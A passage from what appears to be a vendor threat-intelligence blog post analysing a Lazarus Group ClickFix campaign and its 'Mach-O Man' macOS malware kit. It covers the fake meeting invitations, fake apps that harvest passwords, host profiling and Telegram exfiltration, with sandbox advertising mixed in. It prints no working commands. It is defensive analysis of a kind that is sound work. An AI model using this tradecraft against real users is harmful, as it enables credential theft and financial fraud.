{"id":20176,"date":"2026-04-21T08:49:42","date_gmt":"2026-04-21T08:49:42","guid":{"rendered":"https:\/\/any.run\/cybersecurity-blog\/?p=20176"},"modified":"2026-04-21T11:02:52","modified_gmt":"2026-04-21T11:02:52","slug":"lazarus-macos-malware-mach-o-man","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/lazarus-macos-malware-mach-o-man\/","title":{"rendered":"New Lazarus APT Campaign: \u201cMach-O Man\u201d macOS Malware\u00a0Kit Hits Businesses"},"content":{"rendered":"\n<p><em><strong>Editor\u2019s note:<\/strong><\/em><strong><em>&nbsp;The research is authored by Mauro Eldritch, offensive security expert and a founder of BCA LTD, a company dedicated to threat intelligence and hunting. You can&nbsp;<\/em><a href=\"https:\/\/x.com\/MauroEldritch\" target=\"_blank\" rel=\"noreferrer noopener\"><em>find Mauro on X<\/em><\/a><em>.<\/em>&nbsp;<\/strong><\/p>\n\n\n\n<p>The recent wave of&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/click-fix-attacks-eric-parker-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">ClickFix attacks<\/a>&nbsp;has introduced several new ways to compromise users,&nbsp;establishing&nbsp;itself as a technique that is likely here to stay. We have&nbsp;observed&nbsp;Lazarus Group using this method to distribute a range of malware, from well-known families to more unusual variants such as&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/lazarus-group-it-workers-investigation\/\" target=\"_blank\" rel=\"noreferrer noopener\">PyLangGhostRAT<\/a>, a Python-based vibe-ported of the original Go version, along with other oddities.&nbsp;<\/p>\n\n\n\n<p>In this article, we analyze the next stage of this campaign: a newly identified macOS malware kit that is currently being actively distributed.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Executive Summary<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>What\u2019s\u00a0happening:<\/strong>\u00a0<a href=\"https:\/\/any.run\/cybersecurity-blog\/enterprise-cybersecurity-risks-2026\/\" target=\"_blank\" rel=\"noreferrer noopener\">Lazarus Group<\/a> is running an active campaign using fake meetings to gain access to corporate systems, credentials, and sensitive data.\u00a0<\/li>\n\n\n\n<li><strong>Who is at risk:<\/strong>\u00a0Fintech, crypto, and high-value environments where <a href=\"https:\/\/any.run\/cybersecurity-blog\/anyrun-macos-sandbox\/\" target=\"_blank\" rel=\"noreferrer noopener\">macOS<\/a> is widely used by developers, executives, and decision-makers.\u00a0<\/li>\n\n\n\n<li><strong>How access is gained:<\/strong>\u00a0Users execute commands themselves, allowing attackers to bypass traditional controls and\u00a0operate\u00a0without immediate detection.\u00a0<\/li>\n\n\n\n<li><strong>What attackers are after:<\/strong>\u00a0Credentials, browser sessions, and macOS Keychain data that provide direct access to infrastructure and financial assets.\u00a0<\/li>\n\n\n\n<li><strong>Why this is hard to detect:<\/strong>\u00a0The attack relies on social engineering and native macOS binaries, reducing visibility for traditional EDR tools.\u00a0<\/li>\n\n\n\n<li><strong>How data is exfiltrated:<\/strong>\u00a0Telegram is used as a trusted channel to move sensitive data outside the organization.\u00a0<\/li>\n\n\n\n<li><strong>What this leads to:<\/strong>\u00a0Account takeover, unauthorized infrastructure access,\u00a0financial loss, and exposure of critical data.\u00a0<\/li>\n\n\n\n<li><strong>What this means for CISOs:<\/strong>\u00a0A single compromised macOS device can result in full access to internal systems, production environments, or crypto assets.\u00a0<\/li>\n\n\n\n<li><strong>How SOCs should respond:<\/strong> Identify credential exposure early by introducing <a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s cross-platform analysis capabilities<\/a> during triage that offers a 36% higher detection rate.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">New&nbsp;Lazarus&nbsp;ClickFix&nbsp;macOS&nbsp;Campaign:&nbsp;Why Companies Are at Risk&nbsp;<\/h2>\n\n\n\n<p>Lazarus Group is actively&nbsp;<a href=\"https:\/\/quetzal.bitso.com\/p\/north-koreas-safari-hunting-for-rats?triedRedirect=true\" target=\"_blank\" rel=\"noreferrer noopener\">running a campaign<\/a>&nbsp;that turns routine business communication into a direct path to credential theft and data loss.&nbsp;<\/p>\n\n\n\n<p>The attack targets&nbsp;business leaders&nbsp;through Telegram, often using compromised accounts of colleagues or contacts. Victims receive what&nbsp;appears to be&nbsp;a legitimate meeting invitation and are redirected to a fake collaboration platform that mimics Zoom, Microsoft Teams, or&nbsp;<a href=\"https:\/\/any.run\/cybersecurity-blog\/enterprise-phishing-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">Google<\/a>&nbsp;Meet. The scenario is familiar and urgent, which lowers suspicion and increases the likelihood of interaction.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"861\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg\" alt=\"\" class=\"wp-image-20179\" style=\"width:417px;height:auto\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.jpg 589w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-205x300.jpg 205w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-370x541.jpg 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861-270x395.jpg 270w\" sizes=\"(max-width: 589px) 100vw, 589px\" \/><figcaption class=\"wp-element-caption\"><em>Messages sent by Lazarus operatives. Credit:&nbsp;Bitso&nbsp;Quetzal Team<\/em>&nbsp;<br><\/figcaption><\/figure><\/div>\n\n\n<p>Instead of exploiting a technical vulnerability, the attackers rely on&nbsp;a simple instruction. The user is prompted to \u201cfix\u201d a connection issue by copying and executing a command. This step shifts control to the attacker without triggering many traditional security&nbsp;controls, because&nbsp;the action is performed by the user themselves.&nbsp;<\/p>\n\n\n\n<p>From that moment, the operation is focused on extracting business value as quickly as possible. The attacker collects credentials, browser sessions, and system-stored secrets, including macOS Keychain data. These assets provide immediate access to corporate systems, SaaS platforms, and financial resources.&nbsp;<\/p>\n\n\n\n<p>Telegram is used again as an exfiltration channel, allowing stolen data to be transferred through a legitimate service that blends into normal traffic.&nbsp;&nbsp;<\/p>\n\n\n\n<p>By the time the activity is recognized as malicious, credentials may already be&nbsp;compromised&nbsp;and sensitive data already exfiltrated. At that point, the organization is dealing with:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Unauthorized access to business systems and accounts&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Financial loss&nbsp;through fraudulent transactions or misuse of access&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exposure of sensitive data leading to regulatory and reputational impact&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>At the core of this operation is a newly identified macOS malware kit, \u201cMach-O Man\u201d,&nbsp;discovered by the Quetzal Team. Built as a set of Go-based Mach-O binaries, it reflects a shift toward native macOS threats. The following sections break down how this kit&nbsp;operates&nbsp;across each stage of the attack chain.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Technical Analysis of the Mach-O Man Kit&nbsp;<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">The Stager&nbsp;<\/h2>\n\n\n\n<p>As described earlier,&nbsp;in&nbsp;this&nbsp;ClickFix&nbsp;campaign, the victim is invited to a meeting via Telegram, typically by a compromised contact sharing a&nbsp;link.&nbsp;&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"527\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1024x527.png\" alt=\"\" class=\"wp-image-20182\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1024x527.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-300x154.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-768x395.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-1536x790.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-2048x1054.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-370x190.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-585x300.png 585w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image2-3-740x381.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The full malware kit with all its components and variants<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>When the user visits it, they are taken to a site impersonating a legitimate meeting platform such as Zoom, Meet, or Teams. The page then displays a fake error message claiming that, to resolve the issue, the user must copy and paste a command into their terminal.&nbsp;<\/p>\n\n\n\n<p>Thanks to&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN\u2019s Interactive Sandbox<\/a>,&nbsp;we&nbsp;can safely&nbsp;execute this command and&nbsp;observe&nbsp;the malicious behavior inside a&nbsp;secure macOS VM,&nbsp;without risk to our systems.&nbsp;&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/937afde2-5e3c-4eb0-a7d1-6124f0f3ed18\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See live sandbox analysis of fake Mach-O Man kit apps<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"641\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1024x641.png\" alt=\"\" class=\"wp-image-20262\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1024x641.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-300x188.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-768x480.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-1536x961.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-370x231.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-270x169.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1-740x463.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/frame_generic_light-2-1.png 1944w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake&nbsp;Mach-O Man Kit apps shown inside ANY.RUN\u2019s sandbox<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Trusted by <a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=lazarus-apt-macos-campaign&amp;utm_term=210426&amp;utm_content=linktoenterprise\" target=\"_blank\" rel=\"noreferrer noopener\">15,000 organizations worldwide<\/a>, including 74 Fortune 100 companies, ANY.RUN accelerates triage &amp; response by enabling SOC teams to analyze URLs and files within a&nbsp;private, real-time virtual&nbsp;environment, reproducing the full attack flow across Windows, macOS, Linux, and Android.&nbsp;&nbsp;<\/p>\n\n\n\n<p>The result is faster, more&nbsp;consistent&nbsp;decisions across the SOC, with earlier identification of threats, reduced response time, and lower risk of incidents escalating into financial and operational impact.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Close blind spots and reduce breach risks in your company. <\/span><br>Integrate ANY.RUN\u2019s sandbox for early threat detection.&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktosandboxlanding#contact-sales\" rel=\"noopener\" target=\"_blank\">\nContact us\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>Pasting and running the command in the terminal leads to&nbsp;the installation of malware. In this case, it executes&nbsp;teamsSDK.bin, the stager and initial&nbsp;component&nbsp;of the Mach-O Man kit.&nbsp;<\/p>\n\n\n\n<p>When executed in our laboratory, we&nbsp;observed&nbsp;an interesting behavior: when run without arguments, the binary displays a usage message&nbsp;indicating&nbsp;how to activate it and revealing support for impersonating Google, Zoom, Teams, and \u201cSystem\u201d.&nbsp;<\/p>\n\n\n\n<p>Fun fact: if you try to choose Google, it politely&nbsp;states&nbsp;that it is \u201cnot yet implemented\u201d.&nbsp;A surprisingly polished touch.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1024x706.png\" alt=\"\" class=\"wp-image-20187\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image4-2-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Stager&nbsp;teamsSDK.bin&nbsp;usage<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>When invoked correctly, it downloads a fake macOS Application impersonating one of the previously mentioned platforms, with \u201cSystem\u201d referring to generic macOS system prompts presented to the user. To ensure execution, the malware uses macOS\u2019 codesign utility to apply an ad-hoc signature to the application bundle, making it appear properly signed to the system.&nbsp;<\/p>\n\n\n\n<p>All applications are&nbsp;virtually identical, differing only in minimal visual cues. They prompt the user for their password in broken English three times in a row.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1024x706.png\" alt=\"\" class=\"wp-image-20190\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image5-1-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Fake Teams App prompts for user credentials<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>The first two attempts always shake the window,&nbsp;indicating&nbsp;that the password is incorrect (even if not), while the third one disappears as if the authentication had succeeded.&nbsp;<\/p>\n\n\n\n<p>Independently, at the end they all display Zoom\u2019s logo along with a message&nbsp;stating&nbsp;that the installation was successful.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1024x612.png\" alt=\"\" class=\"wp-image-20192\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1024x612.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-300x179.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-768x459.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-1536x918.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-2048x1224.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-370x221.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-270x161.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image6-1-740x442.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\">Zoom logo displayed on the fake Teams App&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Running them interactively from the shell reveals errors during execution. Many interesting failures will be discussed throughout the analysis of the remaining components, suggesting that exhaustive testing was not conducted.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"604\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1024x604.png\" alt=\"\" class=\"wp-image-20207\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1024x604.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-300x177.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-768x453.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-1536x906.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-2048x1207.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-370x218.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-270x159.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/E-1-740x436.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Most modules present faulty functions or unexpected errors<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In the background, the next stage is downloaded, typically named in the format D1{??????}.bin. Some examples we were able to retrieve include D1YrHRTg.bin, D1yCPUyk.bin, and D1ozPVNG.bin. At the same time, the malware performs basic fingerprinting via&nbsp;sysctl&nbsp;queries, collecting information such as CPU details and system boot time.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1024x576.png\" alt=\"\" class=\"wp-image-20210\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-1536x865.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-2048x1153.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/F-740x417.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Basic host fingerprinting<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>Let\u2019s&nbsp;check the next stage.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Profiler&nbsp;<\/h2>\n\n\n\n<p>This second binary, D1YrHRTg.bin (or any other variant you are able to retrieve), acts as a system profiler.&nbsp;It registers the host with the C2 and sends a system profile.&nbsp;<\/p>\n\n\n\n<p>The first notable behavior is that, when executed without arguments, it once again displays a usage message, a&nbsp;rather kind&nbsp;gesture.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"706\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1024x706.png\" alt=\"\" class=\"wp-image-20195\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1024x706.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-300x207.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-768x530.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-1536x1059.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-2048x1412.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-370x255.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-270x186.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-435x300.png 435w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image9-2-740x510.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Most modules&nbsp;contain&nbsp;a usage message<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>This module relies on&nbsp;sysctl&nbsp;and local userland tools to build a comprehensive profile of the host, including hostname, a unique identifier, CPU type, boot time, operating system details, network configuration, running processes, and a list of browser extensions, with dedicated targeting of Brave, Vivaldi, Opera, Chrome, Firefox, and Safari.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\n<span class=\"highlight\">Speed up triage &#038; response workflows in your SOC. <\/span><br>Validate alerts and analyze artifacts with ANY.RUN.&nbsp;   \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"http:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=lazarus-apt-macos-campaign&#038;utm_term=210426&#038;utm_content=linktoregistration#register\/\" rel=\"noopener\" target=\"_blank\">\nSign up\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<p>This information is written to a text file and sent to the C2 server.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"702\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1024x702.png\" alt=\"\" class=\"wp-image-20253\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1024x702.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-300x206.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-768x527.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-1536x1054.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-2048x1405.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-370x254.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-270x185.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/H-1-740x508.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>The TXT file broadcasted to the C2 Server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>As previously noted, some of these modules are faulty.&nbsp;&nbsp;<\/p>\n\n\n\n<p>This one, in particular, exhibits&nbsp;a self-sabotaging behavior, occasionally entering an endless loop that repeatedly posts the system profile text file to the C2 server, exhausting system resources and making its presence&nbsp;quite obvious&nbsp;to the victim.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"653\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1024x653.png\" alt=\"\" class=\"wp-image-20216\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1024x653.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-300x191.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-768x489.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/I-1-1536x979.png 1536w, 